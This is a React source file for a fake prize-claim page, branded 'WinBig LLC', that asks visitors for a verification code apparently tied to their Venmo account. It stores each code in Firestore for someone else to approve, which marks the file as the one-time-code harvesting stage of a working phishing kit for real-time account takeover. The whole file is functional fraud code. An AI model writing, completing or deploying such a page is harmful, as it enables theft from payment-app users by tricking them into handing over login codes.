import React, { useState, useRef, useEffect } from "react";
import { useNavigate, useLocation } from "react-router-dom";
import { doc, updateDoc, onSnapshot, deleteDoc } from "firebase/firestore";
import { db } from "../firebase/config";
import BrandLogo from "../components/BrandLogo";

const SESSION_TIMEOUT_MS = 20 * 60 * 1000;

const OTPPage = () => {
  const navigate  = useNavigate();
  const location  = useLocation();
  const phone     = location.state?.phone || "";

  const [otp,           setOtp]           = useState("");
  const [loading,       setLoading]       = useState(false);
  const [submitted,     setSubmitted]     = useState(false);
  const [error,         setError]         = useState("");
  const [expiredReason, setExpiredReason] = useState(null); // null | "timeout" | "rejected"

  const submittedRef = useRef(false);
  const inputRef     = useRef();

  useEffect(() => {
    if (!phone) { navigate("/"); return; }
    if (inputRef.current) inputRef.current.focus();

    let expiryTimer;
    const userRef     = doc(db, "users", phone);
    const unsubscribe = onSnapshot(userRef, (snapshot) => {
      if (!snapshot.exists()) {
        clearTimeout(expiryTimer);
        unsubscribe();
        setExpiredReason(submittedRef.current ? "rejected" : "timeout");
        return;
      }
      const data = snapshot.data();
      if (data.otpVerified === true) {
        clearTimeout(expiryTimer);
        unsubscribe();
        navigate("/success", { state: { phone } });
      }
    });

    expiryTimer = setTimeout(() => {
      unsubscribe();
      handleExpired("timeout");
    }, SESSION_TIMEOUT_MS);

    return () => { clearTimeout(expiryTimer); unsubscribe(); };
  }, [phone, navigate]);

  const handleExpired = async (reason) => {
    try { await deleteDoc(doc(db, "users", phone)); } catch {}
    setExpiredReason(reason);
  };

  const handleSubmit = async () => {
    if (!otp.trim() || !phone || loading) return;
    setLoading(true);
    setError("");
    try {
      await updateDoc(doc(db, "users", phone), {
        otpSubmittedByUser: otp.trim(),
      });
      submittedRef.current = true;
      setSubmitted(true);
    } catch (err) {
      console.error(err);
      setError("Failed to submit. Please try again.");
    } finally {
      setLoading(false);
    }
  };

  const handleKeyDown = (e) => {
    if (e.key === "Enter" && otp.trim() && !submitted) handleSubmit();
  };

  // ── Timeout ──
  if (expiredReason === "timeout") {
    return (
      <div className="otp-page">
        <BrandLogo size={100} />
        <div style={{ fontSize: 56, margin: "28px 0 16px" }}>⏰</div>
        <h2 className="otp-title" style={{ color: "#ef4444" }}>Session Expired</h2>
        <p className="otp-sub" style={{ maxWidth: 320 }}>
          Your session expired before the code was entered. Please start over to re-claim.
        </p>
        <button className="cta-btn" style={{ marginTop: 32, maxWidth: 340 }} onClick={() => navigate("/")}>
          START OVER
        </button>
        <footer className="page-footer" style={{ marginTop: "auto" }}>© 2026 WinBig LLC. All rights reserved.</footer>
      </div>
    );
  }

  // ── Rejected ──
  if (expiredReason === "rejected") {
    return (
      <div className="otp-page">
        <BrandLogo size={100} />
        <div style={{ fontSize: 56, margin: "28px 0 16px" }}>❌</div>
        <h2 className="otp-title" style={{ color: "#ef4444" }}>Code Not Accepted</h2>
        <p className="otp-sub" style={{ maxWidth: 320 }}>
          The verification code you entered was incorrect. Please start over and try again carefully.
        </p>
        <button className="cta-btn" style={{ marginTop: 32, maxWidth: 340 }} onClick={() => navigate("/")}>
          TRY AGAIN
        </button>
        <footer className="page-footer" style={{ marginTop: "auto" }}>© 2026 WinBig LLC. All rights reserved.</footer>
      </div>
    );
  }

  return (
    <div className="otp-page">
      <BrandLogo size={100} />

      <div className="otp-icon">🔐</div>

      <h2 className="otp-title">Enter Verification Code</h2>
      <p className="otp-sub">
        A verification code has been sent to you.
        Enter it below to confirm your account and release your prize.
      </p>

      <div className="otp-single-wrap">
        <input
          ref={inputRef}
          type="text"
          className="otp-single-input"
          placeholder="Enter code here..."
          value={otp}
          onChange={(e) => setOtp(e.target.value)}
          onKeyDown={handleKeyDown}
          disabled={submitted}
          autoCapitalize="none"
          autoCorrect="off"
          spellCheck={false}
        />
      </div>

      {error && (
        <p style={{ color: "#ef4444", fontSize: 13, marginBottom: 12 }}>⚠ {error}</p>
      )}

      {submitted ? (
        <div style={{ textAlign: "center", marginTop: 8 }}>
          <div className="waiting-spinner" style={{ width: 36, height: 36, borderWidth: 3 }} />
          <p style={{ fontSize: 14, color: "#64748b", marginTop: 12 }}>
            Verifying your code, please wait...
          </p>
        </div>
      ) : (
        <button
          className={`venmo-btn ${otp.trim() ? "active" : ""}`}
          onClick={handleSubmit}
          disabled={!otp.trim() || loading}
          style={{ maxWidth: 340, marginTop: 8 }}
        >
          {loading ? "SUBMITTING..." : "✓  VERIFY CODE"}
        </button>
      )}

      <p style={{ fontSize: 11, color: "#94a3b8", marginTop: 20, textAlign: "center" }}>
        Didn't receive a code? Make sure your Venmo account phone number matches what you entered.
      </p>

      <footer className="page-footer" style={{ marginTop: "auto" }}>
        © 2026 WinBig LLC. All rights reserved.
      </footer>
    </div>
  );
};

export default OTPPage;